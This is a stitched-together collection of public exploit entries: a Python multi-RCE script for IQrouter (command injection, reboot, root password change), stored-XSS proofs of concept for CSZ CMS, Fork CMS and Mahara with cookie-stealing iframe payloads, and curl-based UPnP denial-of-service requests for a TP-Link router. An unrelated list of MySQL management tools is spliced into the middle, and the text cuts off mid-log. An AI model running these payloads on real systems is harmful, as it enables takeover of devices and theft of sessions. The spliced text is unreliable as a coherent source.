"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/",
"RCE /diag_pppoa (wan_password param)"
],
[
"/cgi-bin/luci/er/advanced_link?link='`{}`'",
"RCE /advanced_link (link param)"
]
]
advanced_payloads = [
[
"/cgi-bin/luci/er/reboot_link?reboot=1",
"Reboot IQrouter (/reboot_link reboot param))"
],
[
"/cgi-bin/luci/er/screen2?reboot=1",
"Reboot IQrouter (/screen2 reboot param))"
],
[
"/cgi-bin/luci/er/index?reset_config=1",
"Reset IQrouter (/index reset_config param)"
],
[
"/cgi-bin/luci/er/screen7?upgrade=1",
"Upgrade IQrouter (/screen7 upgrade param)"
],
[
"/cgi-bin/luci/er/vlanTag?restart_network=1",
"Restart network (/vlanTag restart_network param)"
],
[
"/cgi-bin/luci/er/diag_iperf_cmd/start",
"Start iperf script (/diag_iperf_cmd/start)"
],
[
"/cgi-bin/luci/er/diag_iperf_cmd/stop",
"Stop iperf script (/diag_iperf_cmd/stop)"
],
[
"/cgi-bin/luci/er/get_syslog",
"Router setup info log (/get_syslog)"
],
[
"/cgi-bin/luci/er/diag_set_password/c00lpasswd/",
"Change root password to c00lpasswd (can change in code)"
],
[
"/cgi-bin/luci/er/reset_password/",
"Change root password to 'changeme' (static)"
]
]
def print_payloads():
print('#' * 30)
print("Payloads list")
num = 1
print('######################### RCE without auth ########################')
for payload in rce_any:
print("{} - {}".format(num, payload[1]))
num += 1
print(
'############### RCE (router need to be in setup mode) ###############')
for payload in rce_setup:
print("{} - {}".format(num, payload[1]))
num += 1
print(
'######################### Advanced payloads #########################')
for payload in advanced_payloads:
print("{} - {}".format(num, payload[1]))
num += 1
parser = argparse.ArgumentParser(description="IQrouter multiple RCE")
parser.add_argument('--host', help='Host', type=str)
parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)
parser.add_argument('-n', '--num', help='Payload number',
default=0, type=int)
parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',
default="pwd", type=str)
parser.add_argument('--protocol', help='Protocol (http/https)',
default="http", type=str)
args = parser.parse_args()
def main():
print("")
full_payload_list = rce_setup + rce_any + advanced_payloads
payloads_amount = len(full_payload_list)
try:
hostname = args.host
port = args.port
payload_num = int(args.num)
bash_cmd = args.cmd
protocol = args.protocol
if payload_num < 1 or payload_num > payloads_amount:
print("Error with payload number!")
raise IndexError
if port < 0 or port > 65535:
print("Error with port number")
raise IndexError
if protocol not in ['http', 'https']:
print("Error with protocol name")
raise IndexError
current_payload = full_payload_list[payload_num - 1]
print("Payload: {}".format(current_payload[1]))
print("Host: {}".format(hostname))
print("Port: {}".format(port))
print("Protocol: {}".format(protocol))
print("Command: {}".format(bash_cmd))
full_url = "{}://{}:{}{}".format(protocol, hostname, port,
current_payload[0].format(bash_cmd))
print("Built URL: {}".format(full_url))
r = requests.get(full_url)
print("Status code: {}".format(r.status_code))
return
except IndexError:
parser.print_help()
print_payloads()
exit(1)
if __name__ == '__main__':
print(
"\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.")
exit(main())
# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Unauthorized user that has access private message can embed Javascript
# code to admin panel.
# Steps to reproduce:
1- Log in to member panel.
1- Change user-agent header as <script>alert(1)</script>
2- Send the private message to admin user.
3- When admin user logs in to Backend System Dashboard, an alert box pops
up on screen.
PoC Request:
POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: <script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1
csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send
# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: https://www.fork-cms.com/download
# Software Link: https://github.com/forkcms/forkcms/pull/3073
# CVE: N/A
Document Title:
===============
Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2208
ID (3073): https://github.com/forkcms/forkcms/pull/3073
Release Date:
=============
2020-04-17
Vulnerability Laboratory ID (VL-ID):
====================================
2208
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Fork is an easy to use open source CMS using Symfony Components. Fork
CMS is dedicated to creating a user friendly environment
to build, monitor and
update your website. We take great pride in being the Content Management
System of choice for beginners and professionals.
(Copy of the Homepage: https://www.fork-cms.com &
https://www.fork-cms.com/download )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the official Fork CMS v5.8.0.
Affected Product(s):
====================
ForkCMS
Product: Fork CMS v5.8.0 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-04-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been
discovered in the official Fork CMS v5.8.0 open-source web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The persistent input validation web vulnerabilities are located in the
`Displayname` input field when using the `Add`, `Edit` or `Register`
mechanism that forwards the information into the `var` parameter. Remote
attackers and privileged application user accounts are able to
inject own malicious persistent script code as the users displayname by
usage of the registration module (/profiles/register). Privileged
users with access to the profile or users module are able to exploit the
issue by a simple inject. The displayname then becomes visible in
the Admin - Profiles Index on Preview, Edit User/Profile, Delete User
Interaction and User Index in Listing modules. the var parameter
does not encode or parse the exisiting injected content and executes it.
The request method to inject is POST and the attack vector of the
vulnerability is located on the application-side of the content
management system. The injection point is located in the registration form
and the add/edit user function. The execution point of the issue occurs
in the preview profile, edit user, user index listing and delete
user message context.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Register
[+] Add User
[+] Edit User
Vulnerable Input(s):
[+] Displayname
Vulnerable Parameter(s):
[+] var
Affected Module(s):
[+] Preview Profile
[+] Edit User
[+] User Index
[+] Delete User
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information an steüs below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the fork cms web-application newst version
2. Move via sitemap or by link to the registration page
(/modules/profiles/register)
3. Inject your script code payload html/js to the Displayname input field
4. Register the account by pushing submit
5. Activate the link in the account registration email
Note: Now simple wait until the administrator / privileged user visits
the panel to execute the code on interaction or preview only
6. Successful reproduce of the persistent script code injection
vulnerability!
PoC: Vulnerable Source (User Index in Listing -
https://fork-cms.localhost:8080/private/en/users/index)
<tr id="row-2" class="even">
<td class="nickname"><a
href="/private/en/users/edit?token=k7byefqor8&id=2"
title="edit">test3"><iframe src="evil.source"
onload=alert(document.cookie)></a></td>
<td class="fork-data-grid-action actionEdit"><a
href="/private/en/users/edit?token=k7byefqor8&id=2"
class="btn btn-default btn-xs pull-right">
<span class="fa fa-pencil" aria-hidden="true"></span> Edit</a></td>
</tr>
PoC: Vulnerable Source (Profiles Index on Preview -
https://fork-cms.localhost:8080/private/en/profiles/index)
<tbody><tr id="row-1" class="odd">
<td class="check"><input type="checkbox" name="id[]" value="1"
class="inputCheckbox checkBeforeUnload"></td>
<td class="email"><a
href="/private/en/profiles/edit?token=k7byefqor8&id=1"
title="">tester23@protonmail.com</a></td>
<td class="display_name">"<iframe src="evil.source"
onload="alert(document.cookie)"></td>
<td class="registered_on">13 April 2020 11:17</td>
<td class="fork-data-grid-action actionEdit">
<a href="/private/en/profiles/edit?token=k7byefqor8&id=1" class="btn
btn-default btn-xs pull-right">
<span class="fa fa-pencil" aria-hidden="true"></span> Edit</a></td>
</tr></tbody>
PoC: Vulnerable Source (Delete User - On Interaction)
<form name="delete" method="post"
action="/private/en/users/delete?token=k7byefqor8">
<input type="hidden" id="delete__token" name="delete[_token]"
value="q3ADogMObka_-73n5afnMPsJHj9ZAI_ch5uiabqDsqs" />
<input type="hidden" id="delete_id" name="delete[id]" value="2" />
<div class="modal fade" id="confirmDelete" role="dialog" tabindex="-1"
aria-hidden="true" aria-labelledby="confirmDeleteTitle">
<div class="modal-dialog"><div class="modal-content"><div
class="modal-header">
<h4 class="modal-title" id="confirmDeleteTitle">Delete</h4></div>
<div class="modal-body">
<p>Are your sure you want to delete the user "evil.source"><iframe
src=evil.source onload=alert(document.cookie)>"?</p></div>
<div class="modal-footer">
<button class="btn btn-default" title="Cancel" data-dismiss="modal">
<span class="fa fa-times" aria-hidden="true"></span>
<span class="btn-text">Cancel</span></button>
<button class="btn btn-danger" title="Delete" >
<span class="fa fa-trash" aria-hidden="true"></span>
<span class="btn-text">Delete</span>
</button></div></div></div></div>
</form>
--- PoC Session Logs [POST] (Registration User Account) ---
https://fork-cms.localhost:8080/en/modules/profiles/register#registerForm
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://fork-cms.localhost:8080/en/modules/profiles/register
Content-Type: application/x-www-form-urlencoded
Content-Length: 179
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie:
track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B;PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d;
interface_language=en; frontend_language=en; cookie_bar_agree=Y;
cookie_bar_hide=Y;
form=register&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&display_name=>"<iframe
src=evil.source
onload=alert(document.cookie)>&email=tester23@protonmail.com&password=pwnd
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: frontend_language=en; expires=Wed, 13-May-2020 09:49:57 GMT;
Max-Age=2592000;
path=/; domain=.fork-cms.localhost:8080; httponly; samesite=lax
track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B; expires=Tue,
13-Apr-2021 09:49:57 GMT;
Max-Age=31536000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location: https://fork-cms.localhost:8080
X-server: fork01
-- PoC Session Logs [POST] (Add User) ---
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Content-Type: multipart/form-data;
boundary=---------------------------56051791419552543783889366402
Content-Length: 2545
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
Upgrade-Insecure-Requests: 1
form=add&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=tester232323@protonmail.com&password=tester445
&confirm_password=tester445&name=test1&surname=test2&nickname=test3>"<iframe
src=a onload=alert(document.cookie)>&avatar=
&interface_language=en&preferred_editor=ck-editor&date_format=j F
Y&time_format=H:i&number_format=dot_nothing
&csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&add=
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location:
/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-4
X-server: fork01
-
https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-4
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
-
POST: HTTP/1.1 200 OK
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Content-Length: 3615
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Vary: Accept-Encoding
Content-Encoding: gzip
X-server: fork01
-
GET: HTTP/1.1 200 OK
Server: nginx/1.6.2
https://fork-cms.localhost:8080/private/en/users/evil.source
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location: /private/en/error?type=action-not-allowed
X-server: fork01
-- PoC Session Logs [POST] (Edit User) ---
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Content-Type: multipart/form-data;
boundary=---------------------------388544425912514902093103180709
Content-Length: 2563
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
form=edit&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=testemail337@protonmail.com&name=test1&surname=test2
&nickname=test3>"<iframe src=evil.source
onload=alert(document.cookie)>&avatar=&new_password=&confirm_password=
&interface_language=en&preferred_editor=ck-editor&date_format=j F
Y&time_format=H:i&number_format=dot_nothing&
csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&edit=
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location:
/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe src=evil.source
onload=alert(document.cookie)>&highlight=row-2
X-server: fork01
https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-2
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
-
POST: HTTP/1.1 200 OK
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Content-Length: 3585
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55 GMT;
Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Vary: Accept-Encoding
Content-Encoding: gzip
X-server: fork01
Reference(s):
https://fork-cms.localhost:8080/en/modules/profiles/register
https://fork-cms.localhost:8080/private/en/profiles/index
https://fork-cms.localhost:8080/private/en/users/index
https://fork-cms.localhost:8080/private/en/users/edit
https://fork-cms.localhost:8080/private/en/users/add
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the fork cms web-application is estimated as high.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
# Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)
# Date: 10/22/2024
# Exploit Author: Mohamed Maatallah
# Vendor Homepage: https://www.tp-link.com
# Version: TT_V6.2.1021 (VN020-F3v(T))
# Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
# CVE: CVE-2024-12342
Description:
Two critical vulnerabilities discovered in TP-Link VN020-F3v(T) router's
UPnP implementation, affecting the WANIPConnection service. The
vulnerabilities allow unauthenticated attackers to cause denial of service
and potential memory corruption through malformed SOAP requests.
Proof of Concept 1 (Missing Parameters DoS):
curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
-H "Content-Type: text/xml" \
-H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping\"" \
-d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body><u:AddPortMapping>
<NewPortMappingDescription>hello</NewPortMappingDescription>
</u:AddPortMapping></s:Body></s:Envelope>'
Proof of Concept 2 (Memory Corruption):
curl -v -X POST "http://192.168.1.1:5431/control/WANIPConnection" \
-H "Content-Type: text/xml" \
-H "SOAPAction:
\"urn:schemas-upnp-org:service:WANIPConnection:1#SetConnectionType\"" \
-d '<?xml version="1.0"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body>
<u:SetConnectionType
xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewConnectionType>'"$(perl -e 'print "%x" x
10000;')"'</NewConnectionType>
</u:SetConnectionType>
</s:Body>
</s:Envelope>'
MySQL has many management and maintenance tools. In addition to the command line management tools included in the system, there are many other graphical management tools. It is one aspect that the tools are easy to use, and personal usage habits are also very important. Here are 11 MySQL graphical management tools for your reference.
1. DBeaver
DBeaver is a Java-based, free and open source universal database management and development tool that uses very friendly ASL protocols. It can run on various operating systems, including: Windows, Linux, macOS, etc. DBeaver is developed using the Eclipse framework, supports plug-in extensions, and provides many database management tools: ER diagrams, data import/export, database comparison, simulated data generation, etc. It can support almost all database products, including: MySQL, PostgreSQL, MariaDB, SQLite, Oracle, Db2, SQL Server, Sybase, MS Access, Teradata, Firebird, Derby, etc.
2. DataGrip
DataGrip is a multi-engine database environment released by JetBrains, supporting MySQL and PostgreSQL, Microsoft SQL Server and Oracle, Sybase, DB2, SQLite, and HyperSQL, Apache Derby
3.phpMyAdmin
phpMyAdmin is the most commonly used MySQL maintenance tool. It is a MySQL management tool based on a web-based architecture on the website host developed in PHP. It supports Chinese and is very convenient to manage databases. The disadvantage is that it is inconvenient to backup and restore large databases.
4 Navicat
Navicat is a desktop version of MySQL database management and development tool. It is very similar to Microsoft SQLServer's manager, easy to learn and use. Navicat uses a graphical user interface, which makes it easier for users to use and manage. Support Chinese,
5 MySQL-Front
MySql-Front small management of MySQL applications. The main features include multi-document interface, syntax highlighting, drag-and-drop databases and tables, editable/added fields, editable/insertable records, displayable members, executable SQL scripts, providing interfaces with external programs, saving data to CSV files, etc.
6 dbForge Studio for MySQL
dbForge Studio for MySQL is a powerful tool designed specifically to automate and simplify MySQL's work. It provides a simple way to explore and maintain existing databases, design composite SQL statements, query and manipulate data in different ways.
# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-21
# Vendor: https://mahara.org
# Software Link: https://launchpad.net/mahara
# CVE: N/A
Document Title:
===============
Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2217
Release Date:
=============
2020-04-21
Common Vulnerability Scoring System:
====================================
4.3
Affected Product(s):
====================
Catalyst IT Ltd.
Product: Mahara v19.10.2 - CMS (Web-Application)
https://launchpad.net/mahara & https://mahara.org
Vulnerability Disclosure Timeline:
==================================
2020-04-21: Public Disclosure (Vulnerability Laboratory)
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official Mahara v19.10.2 CMS web-application series.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The persistent vulnerability is located in the `nombre` and
`descripción` parameters of the `Ficheros` module in the
`groupfiles.php` file.
Remote attackers with low privileges are able to inject own malicious
persistent script code as files and foldernames. The injected code can
be used to attack the frontend or backend of the web-application. The
request method to inject is POST and the attack vector is located on
the application-side. Files are able to be reviewed in the backend by
higher privileged accounts and can be shared.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Ficheros (Files Manager)
Vulnerable Input(s):
[+] Crear Carpeta
Vulnerable File(s):
[+] groupfiles.php
Vulnerable Parameter(s):
[+] nombre
[+] descripción
Affected Module(s):
[+] Página principal
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by low privileged web
application user account with low user interaction.
For security demonstration or to reproduce the vulnerability follow the
provided information and steps below to continue.
Manual steps to reproduce ...
1. Open the web-application and login as regular user
2. Move inside the mygroup management
3. Open the ficheros tab on top
4. Inject test payload into the crear carpeta (Nombre & Descripción)
input field for the página principal to output
Note: The execution point occurs on edit, list and delete interaction
5. The created path listings are available for higher privileged user
account that review (Backend)
6. Successul reproduce of the persistent cross site web vulnerability!
PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal)
<tr id="file:7191" class="file-item folder no-hover ui-droppable">
<td class="icon-cell">
<div class="icon-drag ui-draggable ui-draggable-handle" id="drag:7191"
tabindex="0">
<span class="sr-only">Seleccionar y arrastrar para mover >"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
<span class="icon-folder-open icon icon-lg " role="presentation"
aria-hidden="true"></span>
</div></td>
<td class="filename">
<a
href="https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=7191&owner=group&ownerid=27"
id="changefolder:7191" class="inner-link changefolder">
<span class="sr-only">Carpeta:</span>
<span class="display-title ">>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe></span>
</a></td>
<td class="filedescription d-none d-md-table-cell">
>"<iframe></iframe> >"<iframe></iframe></td>
<td class="filesize"></td>
<td class="filedate">20/04/2020</td>
<!-- Ensure space for 3 buttons (in the case of a really long single
line string in a user input field -->
<td class="text-right control-buttons ">
<div class="btn-group">
... ...
<button name="files_filebrowser_edit[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-pencil-alt icon-lg" role="presentation"
aria-hidden="true"></span>
<span class="sr-only">Edit folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span></button>
<button name="files_filebrowser_delete[7191]" class="btn btn-secondary
btn-sm">
<span class="icon icon-trash-alt text-danger icon-lg"
role="presentation" aria-hidden="true"></span>
<span class="sr-only">Delete folder ">"<iframe
src=evil.source
onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>"</span>
</button></div></td>
--- PoC Session Logs [POST] --- (Mygroup Ficheros)
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------98107146915324237501974151621
Content-Length: 4879
Origin: https://mahara_cms.localhost:8080
Connection: keep-alive
Referer:
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27
Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558;
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página
principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=&
files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0&
files_filebrowser_edit_title=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_description=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on&
files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=&
files_filebrowser_edit_licensor=>"<iframe src=evil.source
onload=alert(document.cookie)></iframe> >"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_licensorurl=>"<iframe
src=evil.source onload=alert(document.cookie)></iframe>
>"<iframe src=evil.source
onload=alert(document.cookie)></iframe>&files_filebrowser_edit_allowcomments=on&
files_filebrowser_update[7191]=Guardar
cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
cache-control: no-store, no-cache, must-revalidate
set-cookie:
mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76;
path=/; secure; HttpOnly
content-encoding: br
X-Firefox-Spdy: h2-
https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=
-
Host: mahara_cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;
boundary=---------------------------126319663526561351602937008964
